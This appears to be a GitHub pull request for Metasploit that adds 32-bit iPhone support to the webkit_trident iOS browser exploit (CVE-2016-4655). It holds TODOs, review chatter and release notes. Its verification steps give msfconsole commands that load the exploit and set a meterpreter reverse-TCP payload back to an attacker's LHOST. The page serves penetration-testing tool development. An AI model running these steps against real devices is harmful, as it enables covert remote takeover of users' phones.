
Support 32bit iPhones on the webkit_trident exploit #10812

Merged
merged 16 commits into from Feb 7, 2019

timwr commented Oct 15, 2018

This change adds support for 32-bit iPhones (e.g. iPhone 5C) on the trident exploit.
It's still a work in progress, with a few TODOs to remove.

TODO

  • Fix iOS model/version detection in external/source/exploits/CVE-2016-4655/exploit32.c
  • Remove the hard-coded memcpy offset in external/source/exploits/CVE-2016-4655/exploit32.c
  • Find a way to transfer the mettle payload
  • Fix rapid7/mettle#140
  • Fix rapid7/mettle#141

Verification

List the steps needed to make sure this thing works

  • Fix TODO
  • Build external/source/exploits/CVE-2016-4655 (e.g. run make install32)
  • Start msfconsole
  • use exploit/apple_ios/browser/webkit_trident
  • set payload apple_ios/armle/meterpreter_reverse_tcp
  • set LHOST YOUR_LHOST
  • set LPORT 4444
  • run
  • ...
  • Verify you get a meterpreter session

@timwr timwr force-pushed the timwr:webkit_trident_cleanup branch from d3a9cb7 to 96ba3c6 Oct 16, 2018

timwr commented Oct 16, 2018

@timwr timwr referenced this pull request Oct 16, 2018

Closed

Code-signing the iOS builds #141

@timwr timwr removed the delayed label Oct 21, 2018

timwr commented Oct 21, 2018

This should be ready for testing. I've pushed a debug binary with logging enabled.

@timwr timwr force-pushed the timwr:webkit_trident_cleanup branch from 2667bcf to 4177ff4 Oct 22, 2018

@busterb busterb self-assigned this Nov 21, 2018

timwr commented Feb 4, 2019

Bump. Do we have a device to test this on?
Mine's an iPhone 5C on 9.3.2, but something different would be better.

busterb commented Feb 7, 2019

I have a 32-bit iPad.

timwr commented Feb 7, 2019

Nice! Definitely worth pinging me on slack/hangouts before you start testing. It would be a miracle if this works the first time.

@busterb busterb merged commit 4177ff4 into rapid7:master Feb 7, 2019

3 checks passed

  • Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
  • Metasploit Automation - Test Execution: Successfully completed all tests.
  • continuous-integration/travis-ci/pr: The Travis CI build passed

busterb added a commit that referenced this pull request Feb 7, 2019

busterb commented Feb 7, 2019

I went ahead and landed with the testing I had done locally, plus the mettle payloads bump that brings in the new dylib payload variant needed for the new payloads here.

jmartin-r7 added a commit that referenced this pull request Feb 7, 2019

busterb commented Feb 15, 2019

Release Notes

This adds support for 32-bit iPhones (e.g. iPhone 5C) with the apple_ios/browser/webkit_trident exploit module. It also adds new 32-bit iOS dylib payload types.
